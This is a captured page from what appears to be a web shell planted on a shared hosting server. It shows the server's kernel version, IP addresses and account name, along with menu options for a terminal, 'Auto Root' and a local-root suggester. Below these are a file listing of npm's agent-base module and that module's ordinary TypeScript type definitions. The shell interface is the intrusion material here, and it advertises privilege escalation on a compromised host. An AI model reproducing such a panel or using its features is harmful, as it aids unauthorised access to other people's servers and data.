Linux premium71.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
Server IP : 198.187.29.8 & Your IP : 3.149.246.106
Domains :
Cant Read [ /etc/named.conf ]
User : cleahvkv
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
node_modules /
npm /
node_modules /
agent-base /
Delete
Unzip
Name
Size
Permission
Date
Action
.travis.yml
309
B
-rw-r--r--
2021-03-10 14:36
History.md
3.13
KB
-rw-r--r--
2021-03-10 14:36
README.md
4.91
KB
-rw-r--r--
2021-03-10 14:36
index.d.ts
1022
B
-rw-r--r--
2021-03-10 14:36
index.js
4.3
KB
-rw-r--r--
2021-03-10 14:36
package.json
1.7
KB
-rw-r--r--
2021-03-10 14:36
patch-core.js
1.39
KB
-rw-r--r--
2021-03-10 14:36
Save
Rename
// Type definitions for agent-base 4.2.1 // Project: https://github.com/TooTallNate/node-agent-base // Definitions by: Christopher Quadflieg <https://github.com/Shinigami92> /// <reference types="node" /> import { EventEmitter } from 'events'; declare namespace Agent { export type AgentCallback = ( req?: any, opts?: { secureEndpoint: boolean; } ) => void; export interface AgentOptions { timeout?: number; host?: string; port?: number; [key: string]: any; } export interface Agent extends EventEmitter { _promisifiedCallback: boolean; timeout: number | null; options?: AgentOptions; callback: AgentCallback; addRequest: (req?: any, opts?: any) => void; freeSocket: (socket: any, opts: any) => void; } } /** * Base `http.Agent` implementation. * No pooling/keep-alive is implemented by default. */ declare function Agent(opts?: Agent.AgentOptions): Agent.Agent; declare function Agent( callback: Agent.AgentCallback, opts?: Agent.AgentOptions ): Agent.Agent; export = Agent;